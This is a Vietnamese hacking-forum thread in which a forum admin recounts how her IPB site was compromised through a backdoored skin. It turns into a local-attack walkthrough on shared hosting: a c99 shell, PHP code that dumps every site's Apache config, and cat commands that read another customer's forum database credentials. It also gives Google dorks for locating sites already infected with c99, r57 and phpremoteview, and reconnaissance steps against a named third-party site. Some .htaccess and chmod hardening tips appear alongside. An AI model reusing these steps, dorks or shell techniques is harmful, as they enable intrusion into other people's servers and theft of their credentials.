Latest posts for the topic "Tản mạn Local Attack :D"

Tản mạn Local Attack :D

GirL Noob — GMT

[color="#FF0000"]Phấn 1 :[/color] Mấy ngày qua VN Magic đã bị tấn công liên tục do sự bất cẩn của Quỷnh Anh trong công việc bảo mật . Qua sự việc này Quỳnh Anh tổng kết lại 1 vài điểm căn bản về các hướng đi của attackers trong quá trình local attack . Bài viết sẽ chia làm nhiều phần khác nhau dựa trên các server cấu hình khác nhau và công dụng của r57 , c99 . Trước tiên để mở đầu Quỳnh Anh sẽ tóm tắt lại quá trình VN Magic bị hack như thế nào . Đây thật sự là 1 sai lầm rất lớn của Quỷnh Anh nhưng cũng có thể là bài học kinh nghiệm dành cho các webmasters khác . Diễn đàn VN Magic phát triển trên mã nguồn IPB , và dĩ nhiên là ko hợp pháp vì sử dụng bản nulled , điều này sẽ hạn chế 1 số chức năng hữu ích so với bản có bản quyền , vấn đề này chúng ta sẽ thảo luận ở 1 đề tài khác . Sai lầm của Quỳnh Anh bắt nguồn từ việc import skin của diễn đàn , Quỳnh Anh đã download các skin shared ko rõ nguồn gốc từ các site về IPB của Việt Nam . Trước đây Quỷnh Anh qua trang Google đã có biết đến việc đính kèm shell vào skin forum như sources shared do 1 nhóm " hắc cờ " Việt Nam thực hiện . Các bạn hãy mở trang Google lên và search với từ khóa sau : Code:

intitle:R57shell - Developed by Navaro - Vn Force Group

Kết quả sẽ cho ta rất nhiều sites đã bị đính kèm shell của nhóm Vn Force Group nào đó , lướt sơ qua các links tìm được từ Google sẽ cho ta biết các sites nạn nhân đa số đều sử dụng sources , skin cho forum đã bị đính kèm php shell , Quỳnh Anh xin để các bạn cảm nhận riêng của mỗi người về [color="#FF0000"]thủ đoạn[/color] này . Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân :) . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra . Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người :D . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này . Nhưng Quỳnh Anh thiết nghĩ điều này cũng ko thể ngăn cản chúng ta sử dụng free stuffs từ Internet :P . Chỉ cần các bạn chú ý hơn trong công việc bảo mật site của mình . Ví dụ như với các skin shared dành cho IPB nếu có đính kèm shell hay mã độc thì chúng ta sau khi import vào board của mình , hãy tạo 1 files [color="#FF0000"].htaccess[/color] có nội dung sau và đâ vào các folders chức files skin :

Order allow,deny Deny from all

Với hàng màu đỏ là tùy biến các đuôi files ko cho phép sử dụng trực tiếp , các bạn có thể thêm vào hoặc bớt đi các tùy biến khác . Và đối với các trang sử dụng IPB chúng ta tốt nhất là nên đặt file [color="#FF0000"].htaccess[/color] nói trên vào tất cả các folders con của board ( trừ directory chính ra :P ) , tác dụng có lẽ các bạn cũng đã hiểu Quỳnh Anh sẽ ko nói thêm nữa . Quỳnh Anh viết bài này với mong muốn nhận được sự giúp đỡ ý kiến của tất cả mọi người trên tinh thần chia sẽ , rất mong được các anh chị đi trước cũng như bạn bè gần xa hướng dẫn thêm cho Quỳnh Anh vì Quỳnh Anh thật sự chỉ là newbie :) . Qua sự việc VN Magic bị hack , Quỳnh Anh xin thành thật nhận khuyết điểm và Ban Quản trị VN Magic sau khi xét qua " [color="#00FF00"]công và tội[/color] " của Quỳnh Anh trong thời gian qua đã quyết định hạ Quỳnh Anh xuống 1 cấp ( huhu :( ) , VN Magic Root Admin hiện tại sẽ do anh [color="#FF0000"]Qhoa[/color] đảm nhận . Phần 1 Quỳnh Anh xin tạm ngừng ở đây , phần sau chúng ta sẽ thực nghiệm lại quá trình VN Magic bị local attack và hướng local attack tren [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]ww.ixwebhosting.com[/color] ) .

Tản mạn Local Attack :D

BigballVN — GMT

Lão Na ơi là lão Na. Lão làm gì mà share cho nhiều người con R57 thế để giờ mang tội :D) . Tốt nhất là bạn nên edit lại cái search nếu không bạn sẽ trở thành người vẽ đường hươu chạy đấy. :idea:

Tản mạn Local Attack :D

GirL Noob — GMT

[color="#FF0000"]Phần 2 :[/color] Ở phần này chúng ta sẽ cùng thảo luận về local attack căn bản nhất là tấn công vào database 1 site ( kỹ thuật nâng cao như Get root và Mass Deface Quỳnh Anh sẽ trình bày ở các phần tiếp theo ) . Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :

Như Quỳnh Anh đã nói qua ở phần 1 , chúng ta sẽ dễ dàng nhận thấy nhân vật dinhcaohack này hóa ra " [color="#FF0000"]upload shell , tìm path và exploit[/color] " lại bằng kiểu như thế :| ... Điều này chúng ta tạm gác qua một bên vì Quỳnh Anh hiện tại ko muốn nói cảm nhận của mình về 1 con người như vậy . VN Magic lỗi từ trong source nên việc bị drop database ko cần phải nói thêm nữa . VN Magic thời gian vừa qua đặt trên [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]www.ixwebhosting.com[/color] ) , do khi mua host , phía nhà cung cấp đã gọi điện thoại để confirm nên Quỳnh Anh quá chủ quan ko chú trọng vào việc bảo mật trang board của VN Magic vì Quỳnh Anh ko nghĩ 1 nhóm nào đó muốn tấn công kiểu local attack vào VN Magic lại có thể dùng CC chùa để mua host được , hoặc ít nhất cũng ko làm vậy ... Trở lại VN Magic sau khi bị drop , nhân vật dinhcaohack này muốn che dấu các bước đi của mình ( để khai thác lâu dài hay một mục đích gì khác mà Quỳnh Anh chưa biết ) nên đã tạo upload [color="#FF0000"]c99[/color] vào folder [color="#2E8B57"]testsh [/color] của site [color="#2E8B57"]www.viethacker.name[/color] , site này nằm chung account với VN Magic trên IX WEB HOSTING nên không khó để làm việc này vì folder nói trên được [color="#FF0000"]CHMOD 777[/color] ( ở phần 3 của bài viết chúng ta sẽ đi chi tiết vào vấn đề này ) . Phần dưới đây Quỳnh Anh sẽ trình bày về kiểu local attack căn bản nhất qua sử dụng c99 là tấn công vào database của site . Quỳnh Anh đã nói ở trên là viethacker.name và vnmagic.net cùng 1 account nên không khó gì để khai thác , nhưng bài viết ở dưới đây sẽ ví dụ như viethacker.name và vnmagic.net nằm trên cùng server mà ko có cùng account ( điều này quan trọng vì mỗi các site đặt trên server đều có path riêng dựa theo 1 quy tắc nhất định ) . Chúng ta sẽ tiến hành local attack VN Magic từ c99 mà dinhcaohack đã đặt trên viethacker.name :

Host server của IX WEB HOSTING thoáng qua thì có thể lầm tưởng là khá an toàn khi set quyền trên server , ví dụ như ko thể dùng lệnh cd trực tiếp từ site này qua site khác , ko thể view các thư mục quan trọng , nhưng lại có những kẽ hở khác ví dụ như từ site này có thể dùng lệnh ls để view cấu trúc site khác . Các bạn hãy xem tiếp hình dưới đây sau khi chuyển qua Work Directory là [color="#FF0000"]/hsphere/local/[/color] :

Attacker có thể dễ dàng view thư mục [color="#FF0000"]config[/color] của server , và cũng như vậy đối với phần apache config của các sites đặt trên server .

Các files [color="#FF0000"]*.conf[/color] nếu các bạn có am hiểu về Apache sẽ ko xa lạ gì nữa . Để có thể xem được cấu hình của từng site trên server này , chúng ta sẽ copy lại toàn bộ tên của các files .conf nói trên và tạo 1 php script có nội dung như sau :

"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/[color="#FF0000"]15470533[/color].conf")."
"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15469239.conf")."
"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15468170.conf")."
"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15462385.conf")."
"; ..............................................................................................................; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15344463.conf")."
"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15331662.conf")."
"; $a.=""; echo $a; ?>

với các số [color="#FF0000"]15470533[/color] chính là tên của config mỗi site , save file này thành hack.php và upload lên folder testsh của viethacker.name ( folder này chmod 777 ) , dùng URL Browser chạy file này ta sẽ có kết quả :

View Page Source và tìm đến tên trang muốn khai thác như bài viết này trình bày về hack vnmagic.net :

Bạn sẽ thấy toàn bộ phần Virtual Host của site , có được path chính của trang vnmagic.net là [color="#FF0000"]/hsphere/local/home/mna291/vnmagic.net[/color] , trở lại c99 dùng lệnh ls -lia :

Ta sẽ thấy được toàn bộ cấu trúc của VN MAGIC , và không khó khăn gì để tiếp tục view vào folder board của vnmagic.net đồng thời dùng lệnh cat để đọc nội dung file config của forum : cat /hsphere/local/home/mna291/vnmagic.net/board/conf_global.php >>> chúng ta sẽ có kết quả :

Tới đây chắc hẳn mọi người sẽ biết các bước tiếp theo như thế nào rồi . Qua chuyện này Quỳnh Anh thật ko dám đánh giá trình độ của các tay tấn công VN Magic mấy ngày vừa qua , bởi có database rồi mà ko biết làm sao để deface khi vướng cái pass protect của ACP ( gợi ý dùng John The Ripper :P ) , đành phải giở trò drop database của VN Magic :lol: . Đã thế trong lúc chuyển server chưa phát hiện lỗi từ source và chưa on .htaccess nên khiến cho nhân vật vn3security nào đó của hội HCE " đục nước béo cò " nhảy vào phá database của VN Magic thêm lần nữa :) . Nên khinh hay nên buồn cho khả năng của những người như thế nhỉ :( . Giải pháp đặt ra tạm thời nếu bạn sử dụng host của server này để chạy 1 forum như VN Magic thì chmod các folders con là 701 , directory chính của site ví dụ như /hsphere/local/home/mna291/vnmagic.net/ chmod 101 sau khi hoàn thành setup board , đồng thời đổi vị trí file config forum và Zend lại toàn bộ source cùng đặt file .htaccess như đã nói ở phần 1 , điều này sẽ hạn chế được rất nhiều sự khai thác của attackers . Tuy ko phải là ko thể khai thác được ( Quỳnh Anh sẽ nói ở 1 chủ đề khác về việc decode Zend ) nhưng ít ra cũng làm mấy anh chàng " gà " cụt hứng . Phần 2 Quỳnh Anh sẽ ngưng ở đây , phần sau Quỳnh Anh sẽ trình bày 1 số kỹ thuật đơn giản qua các php shell c99 và r57 , netcat bổ sung thêm cho đề tài Local Attack trước khi vào phần nâng cao .

Re: Tản mạn Local Attack :D

mudzot — GMT

Không hiểu Navaro là ông nào và VnForce là nhóm nào mà ko thấy xấu hổ. Không biết thêm thắt được gì vào r57shell mà cũng cứ phải táng developed by vào mới chịu được. Về ví du local attack ở phần 2, giai đoạn đọc file config forum để lấy pass vào database nếu cùng account thì ko sao, nếu khác account mà còn đọc được thì chứng tỏ host xịt, làm ảnh hưởng tới khách hàng. Ý kiến cá nhân của tớ là phải tìm host khác.

Re: Tản mạn Local Attack :D

conmale — GMT

Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.

Re: Tản mạn Local Attack :D

EnterX — GMT

conmale wrote:

Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.

:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method

Re: Tản mạn Local Attack :D

conmale — GMT

Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn. E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó ;)). Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường. Tip: soi các block base64 để biết chi tiết.

Tản mạn Local Attack :D

Mr.Khoai — GMT

Anh conmale cứ đùa. Các lão "kitties" mà chịu soi cái đống base64 thì chắc đã không chơi các trò vô ích như thế. Cũng phải nói thật, r57 và c99 phải nói là rất phổ biến. Không biết đã có bao nhiêu site bị dính các con này rồi. khoai

Re: Tản mạn Local Attack :D

GirL Noob — GMT

Cảm ơn anh conmale đã chỉ điểm , em sẽ cố gắng hoàn thành các phần còn lại của bài viết này với hi vọng giúp các newbie như em đúc kết được 1 số kinh nghiệm thiết thực trong việc bảo mật site của mình . Rất mong được các anh chị và các bạn đi trước hướng dẫn thêm cho những sai sót ko thể tránh . Và đúng như anh Khoai nói , vô số sites đang bị khống chế bởi các loại php shell . Thử dùng Google và search với những từ khóa đơn giản sau đây : C99:

intitle:c99shell filetype:php

R57

intitle:r57shell filetype:php

Php remote wiev

intitle:"phpremoteview" filetype:php

:(( .

Re: Tản mạn Local Attack :D

GirL Noob — GMT

EnterX wrote:

:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method

GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ? Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ?

Re: Tản mạn Local Attack :D

EnterX — GMT

GirL Noob wrote:

EnterX wrote:

:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method
GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ? Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ?

Mình nói thế chẳng qua dạo này thấy có quá nhiều người dùng kiểu hack này một cách máy móc, đại loại như hack vbb thông qua hack ipb... Bản thân mình trước đây cũng khác nhiều lần hack local nên mới nói vậy. Còn mình ko coi thường get root, mình quan niệm get root ở 1 "đẳng cấp khác", là hack server rồi chứ ko còn coi đó là hack web bằng phương pháp local nữa. Do đó theo quan niệm của mình thì local vẫn là 1 "stupid method"

Tản mạn Local Attack :D

GirL Noob — GMT

[color="#FF0000"]Phần 3 :[/color] Tiêu đề của bài viết này là " [color="#00FF00"]Tản mạn ...[/color] " cho nên Quỳnh Anh nghĩ chúng ta ko nhất thiết phải tập trung vào một vấn đề nào đó mà sẽ thảo luận về tất cả những gì có liên quan xoay quanh chủ đề chính . Sau 2 phần đầu , lướt sơ qua Quỳnh Anh thấy đa số các bạn mới tìm hiểu về hacking còn rất mơ hồ về vấn đề Local Attack , vậy nên phần này chúng ta sẽ tạm gác các kỹ thuật khai thác cũng như công dụng ( cũng như tác hại :P ) của r57 , c99 qua 1 bên để bàn ra xa hơn 1 chút nhằm mục đích thư giãn trước khi đi tiếp các phần sau . Khi Quỳnh Anh đặt ra câu hỏi : [color="#FF0000"]Làm sao để Local Attack 1 site nào đó ( mục tiêu xác định ) ? [/color] thì hầu hết câu trả lời mà Quỷnh Anh nhận được đều đại loại như : " Dễ ẹc , dùng CC chùa mua host chung với site đó rồi up shell lên " , hoặc " Ôi trời có gì đâu , cứ kèm code ( để remote file attack ) hoặc gắn shell vào sources rùi share cho victim download ( như VN MAGIC bị vừa rồi ) " . Hix hix vậy nên đa số đều có vẻ ngập ngừng khi Quỳnh Anh hỏi tiếp : [color="#FF0000"]Nếu victim đặt trên private server ( ko phải share host ) và cũng ko download sources " kèm trẻ em " của mình thì thế nào ?[/color] Cá nhân Quỳnh Anh nghĩ rằng không có gì là tuyệt đối cả , ko bằng cách này thì cũng sẽ có cách khác ... Tiếp theo dưới đây Quỳnh Anh muốn nhắc lại một chút về công dụng của các trang Search , công cụ tìm kiếm trực tuyến mà nhiều bạn lơ là ko tận dụng . Giả sử như mục tiêu Quỳnh Anh đặt ra là trang hcvgroup.net ( Quỳnh Anh xin lỗi mấy chú HCE Group trước vì lấy site mấy chú làm ví dụ cho bài viết nhưng thiết nghĩ ví dụ thì chỉ là ví dụ , nó chẳng có tác hại gì :P ) , trang này nằm trên private server và có vẻ khá an toàn . Mở Command Prompt ping thử trang này xem sao :

Kết quả cho ta thấy IP của site này là 85.114.134.144 . Tiếp tục mở trang [color="#00FF00"]www.live.com[/color] lên và tìm kiếm như sau :

Kết quả sẽ cho chúng ta thấy các sites khác có cùng IP với hcegroup.net :

Nhìn vào kết quả tìm kiếm chúng ta sẽ thấy cái HCE prIvAtE vErsIOn gì đó ( domain hcegroup.biz ) [color="#FF0000"]powered by vBulletin[/color] . Tới đây chắc các bạn cũng hiểu được hướng Quỳnh Anh đang tiến hành rồi phải ko :) ? Không đi trực tiếp được thì chúng ta sẽ đi vòng hihi . Tiếp tục vào xem trang này xem có thu thập thêm được thông tin gì ko :

Powered by vBulletin® Version 3.6.4 Copyright ©2000 - 2007, Jelsoft Enterprises Ltd.

Àh àh VBB ver 3.6.4 , hình như VBB có thể chèn thêm code vào temp ( để gọi php shell _ RFI >>> Local Attack hcegroup.net ) nếu chiếm được quyền admin . Mở Yahoo hoặc Google lên và search thử với các từ khóa :

Exploit vBulletin ver 3.6.4

Kết quả cũng ko đến nổi tệ chứ :P . Vào trang [color="#00FF00"]www.milw0rm.com[/color] chúng ta sẽ có kết quả trực tiếp hơn :

Quỳnh Anh tạm thời ngừng phần 3 ở đây vì nếu đi tiếp e rằng sẽ lạc đề , chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa :P . Các phần sau của bài viết hi vọng sẽ thú vị hơn và giúp cho mọi người có một cái nhìn thực tế hơn về mức độ nguy hiểm của Local Attack . [color="#9ACD32"]Lưu ý bài viết trên đây chỉ có giá trị tham khảo , thực tế ko hẳn là như vậy đâu nhé các bạn .[/color]

Tản mạn Local Attack :D

nhimthulinh — GMT

Thôi mà, tình hình bắt đầu căng thằng rùi đấy, "anh" EnterX cứ để cho "chị" GirL Noob trình bày hết phần nàycho chúng em học hỏi đã chứ, anh làm "chỉ" cụt hứng tịt luôn thì tụi em (newbie) sẽ mất 1 cơ hội tốt để hỉu thêm về Local Atack đó!! ==Trích lời sư phụ conmale == Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn. E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó . Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường. Tip: soi các block base64 để biết chi tiết. ============= Câu cuối (tip...) sư phụ nói thế nghĩa là sao?? Xin chỉ giáo! Conmale nói đúng đó, thật ra Nhím cũng là 1 Kiddie (kid + die = ?? ^^), cũng từng nghĩ rằng cứ Local Attack là phải upload cho dc con c99, hay r57 lên host cần attack, cũng từng up dc mấy con lên host của người ta, cũng sử dụng shell của VN Force gì gì đó. Vậy thì mong chị GirL Noob hoàn thành loạt bài viết này để những "nhóc chết" (kid die) tụi em có dịp tìm hiểu và phát triển nhe!

Tản mạn Local Attack :D

phstiger — GMT

Các bác cho hỏi em đã thử với con r57, Safe Mode: OFF view được cấu trúc file của server nhưng không upload và view được file config.php mặc dù thư mục dạng: drwxr-wxr-wxr. Vậy còn điều kiện nào để có thể view và upload file lên nữa không vậy?

Tản mạn Local Attack :D

kilua_vniss — GMT

Đúng là con gái viết văn dài quá :">

Tản mạn Local Attack :D

dinhcaohack — GMT

Toàn ý kiến chủ quan (:| Từ 1 con c99 ặc ặc .. và 1 file hack + 1 cái nick DCH Em DH rồi đổ vấy cho dch =)) Tùy anh em suy nghĩ chứ anh em thấy cái việc cd 1 phát sang vnmagic.net luôn là được chứ việc gì phải load hết content của httpd config rồi search path vnmagic.net :-?? Và thứ 2 là sao hacker lại có shell bên viethacker.name không được nêu ra :-?? Thứ 3 là sao server mới windows lại bị hack .. lần nữa ( sau khi host ixi bị drop DB) lại nói không rõ ràng mà chỉ ... chờ bài post khác :-/ .. việc sử dụng source .. ặc ặc ... xin QA trích dẫn đầy đủ attack method như thế nào được không ? Hay là chỉ 1 vài câu :

Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân :) . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra . Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người :D . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này .

Cứ cho là lời nhân vật QA nào đó nhận định là đúng ( ở đây lại thấy 1 điều .. bất cập là có nick Girl Noob post bài của QA bên HVA, ở vnmagic.net cũng có đến .. 2 nicknames : QA v GirlNoob .... Noob hay Núp đấy cứ phải "mượn dao kẻ khác" thế em? ) * Nếu webmaster sử dụng .. nguồn tài nguyên vô tận .. vớ vẩn Thứ nhất 1 webmaster (về lĩnh vực thành lập 1 site hacking.. có tiếng ) không bao giờ sử dụng 1 shared script khi chưa hiểu mục đích của script đó như thế nào (điển hình ở đây là HVA, VHS và vnISS+) .. Thế vậy script này bị .. dính shell là do ... lấy được trên mạng =)) ... buồn cười .. (mình bắt đầu nhớ tới thuật ngữ scriptkiddies) và em QA phải hiểu *.1 : em đã bị hack từ trước và có kẻ đã kịp ... gắn shell vào DB em *.2 : hắn gắn được shell vào DB em .. chứng tỏ .. hắn có chứ đừng nói là thừa khả năng để deface site em ;) *.3 : lần thứ 2 server của em bị hack (dedicated windows server) chẳng phải là do .. bind shell ở cái nào cả =)) < sorry 3verybodie, keep secret! > ** Cái hình đoạn chat của nhân vật " DCH Em DH " với em có thể 1 trong 2 là faked ? Bởi vì ai trong HCV cũng rõ anh và des là 2 .. người rất thân :| ( Ở đây người ta nghĩ tới 1 cảnh tâm lý chiến chia rẽ 2 người =)) supernoob) In short, a thấy rất quái lạ là chỉ trong 1-2 tháng mới thành lập, vnmagic lần lượt thách thức matrix2k ( direct domain matrix2k.org đã bị lão Neo bán từ lâu ), HCE ( vnForce Group), HCV ( defaced ), vnISS+ ( kjngasawa shouted fuckin' sth ...) :D .. Nhưng không lạ lắm là vnmagic cũng đã bị các nhóm trên deface + drop DB tính lần lượt là 3 lần =)) P/S : anh chỉ khuyên em thế này, anh thấy có khá nhiều người PM anh hỏi chuyện này nhưng hầu hết là kiểu : xxx: ke. no xxx: nhung ma xxx: cai' dua' post cai bai nay len xxx: no' ko hieu la xxx: nhu dang khoe xxx: trinh do. cua? no' con non lam' hay sao i Vài lời nhố nhăng :p dinhcaohack :D vnISS+ HVA .

Tản mạn Local Attack :D

EnterX — GMT

Khi đọc đầu phần 3 tôi đã định ko can thiệp và để bạn girl noob tiếp tục topic của bạn. Nhưng đến cuối lại có 1 câu:

chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa :P

Phải chăng bạn coi thường tôi ??? Và dựa vào đâu ??? Xin nhắc lại điều mà ở trên tôi đã nói: tôi đã qua cái thời suốt ngày chỉ đi dùng các bug đã public + local att để hack. Chính bản thân đã từng bị chửi là "stupid method". Tôi ko phải là 1 kẻ kiêu ngạo nhưng cũng đủ tự tin để có câu trả lời "biết rất nhiều" đối với câu hỏi :

xem mình đã biết gì về Local Attack hay chưa

Đừng nhìn người bằng nửa con mắt thế ??? Topic này bàn về kỹ thuật song lại vô cớ đụng chạm và bới móc tới nhiều người, nào là HCE , nào là DCH. Vậy ý đồ của bạn khi mở topic này là gì ??? Xin lỗi vì đã làm loãng chủ đề, bạn girl noob có thể tiếp tục.

Re: Tản mạn Local Attack :D

GirL Noob — GMT

Hihi để tránh làm loãng đề tài , trước khi bước sang phần 4 của bài GirL no0B xin được cảm ơn và tiếp thu ý kiến của tất cả mọi người quan tâm đến chủ đề này và cũng muốn hồi đáp lại lời của dinhcaohack và EnterX 1 lần cuối cùng . Trước tiên GirL no0B xin lỗi bạn EnterX vì đã có những nhận định cá nhân của GirL no0B về quan niệm Local Attack từ phía bạn trong các bài viết ở trên . Mỗi người ai cũng có 1 nhận thức riêng và 1 tầm hiểu biết riêng nên GirL no0B biết là mình sai rồi , hi vọng bạn sẽ ko chấp nhất nữa :P) . Về phần dinhcaohack có lẽ trình độ của you đã đạt tới " đỉnh cao " nên ko thèm xem kỹ phần 1 và 2 của bài viết đã quá rõ ràng . Việc upload 1 file vào 1 folder chmod 777 ko lẽ là vấn đề nan giải ? Thêm nữa nội dung của bài viết chỉ xoay quanh các hướng đi cơ bản của local attack nhằm chia sẽ với mọi người những kinh nghiệm thực tế chứ bản thân VN Magic bị lỗi từ trong source nên có chuyển đi đâu thì vẫn có thể bị phá như thường thôi , điều này bản thân dinhcaohack phải thừa hiểu hơn ai hết :mrgreen: , đừng nên chế ra thêm lỗi server này nọ để gây hoang mang lòng người như thế :lol:) , sau những sự việc xảy ra mấy ngày qua , GirL no0B thừa hiểu rằng làm gì có chuyện nhân nhượng từ đối phương dành cho VN Magic , nếu đã dùng thủ đoạn thì ngại gì mà ko dám nhận chứ ( ở đời trình độ ko đủ thì dùng thủ đoạn là lẽ bình thường mà ) ? nếu you cảm thấy GirL no0B nói ko đúng thì xin mời 1 lần nữa " in dấu " lên VN Magic cho GirL no0B tâm phục khẩu phục ( đây ko phải là lời thách thức mà chỉ đơn giản là muốn mở rộng tầm nhìn thôi , đừng hiểu lầm nhé ) . Tiếp tục , trên trang chủ của VN Magic đã giới thiệu rõ ràng GirL no0B cũng chính là Quỳnh Anh >>> admin mới của VN Magic , chỉ có ai ko có mắt mới ko thấy điều này cho nên chẳng có chuyện " mượn dao kẻ khác " này nọ như ý kiến của you . Nếu you làm điều gì khiến cho chính you cảm thấy nhột nhạt thì cũng ko cần phát biểu linh tinh làm gì để lộ ra cái " dại " của mình cho người ta thấy như thế . Việc sử dụng sources và scripts shared là sở thích của cá nhân thôi , GirL no0B ko muốn nói sâu hơn về chuyện này , nhưng đối với GirL no0B thì nhờ như thế mà GirL no0B học thêm được rất nhiều , và ít nhất cũng đã hiểu được trình độ của 1 số nhân vật from HCE , HCV và VNISS . Và cũng qua những điều như vậy mà GirL no0B càng thêm cảm phục các anh quản trị của HVA ( cái này thì GirL no0B sẽ nói sau ở 1 nơi thích hợp hơn ) nên quyết định vào đây để được học hỏi . Domain matrix2k.org hiện tại thuộc sở hữu của VN Magic cho nên việc sử dụng nó làm gì là quyền quản trị VN Magic , GirL no0B nghĩ ko đến nổi nghiêm trọng là sự " thách thức " như you nói chứ ? Còn lại các nhóm HCE hay HCV gì đó xin để mỗi người có ý kiến riêng của mỗi người , đơn cử việc bind shell vào soucres để phá hoại các site khác rồi lạm dụng chữ Hacking - Hacker che đậy cho cái hành động bỉ ổi >>> GirL no0B cảm thấy nực cười . Cuối cùng , GirL no0B xin nhắc lại rằng như đã nói rõ ràng ở phần đầu , bài viết này chỉ mang tính chất chia sẽ , đúc kết từ những kinh nghiệm cá nhân của GirL no0B đồng thời để được sự giúp đỡ từ các anh chị và các bạn đi trước hướng dẫn và chỉ điểm cho những điều sai sót , GirL no0B đã thừa nhận rõ ràng mình chỉ là newbie và luôn tha thiết được mọi người hướng dẫn thêm để bổ sung có cái kiến thức hạn hẹp của GirL no0B , hoàn toàn chẳng có ý khoe khoang như lời dinhcaohack bình luận , vâng trình độ của GirL no0B thì quả thật còn " non lắm " , nhưng cũng tự mừng là ko đến nỗi phải " kèm trẻ em " vào sources mới xóa được toàn bộ files và database của HCV :mrgreen: . Tóm lại đã tự hiểu những lời của mình là nhố nhăng thì ko cần thiết phải nói ra cho mọi người cùng thấy như thế đâu :-o) . Bắt đầu từ sau bài reply này GirL no0B xin mạn phép sẽ ko nói về những việc đi xa với chủ đề chính của Topic nữa . Cảm nhận về các ý kiến cá nhân xin để mọi người tự phán xét . Một lần nữa xin cảm ơn tất cả và hi vọng cùng được giao lưu học hỏi từ mọi người . Quỳnh Anh ( aka GirL no0B )

Re: Tản mạn Local Attack :D

tphong — GMT

Thú vị thật. Minh cũng từng thử qua local attack. Nhưng cũng chỉ đến đó, nghĩ lại cũng thấy xấu hổ. Không tiến thêm được. Ở đời, ăn thua ai "sâu" hơn thôi. :mrgreen:

Tản mạn Local Attack :D

hieuhoc — GMT

conmale wrote:

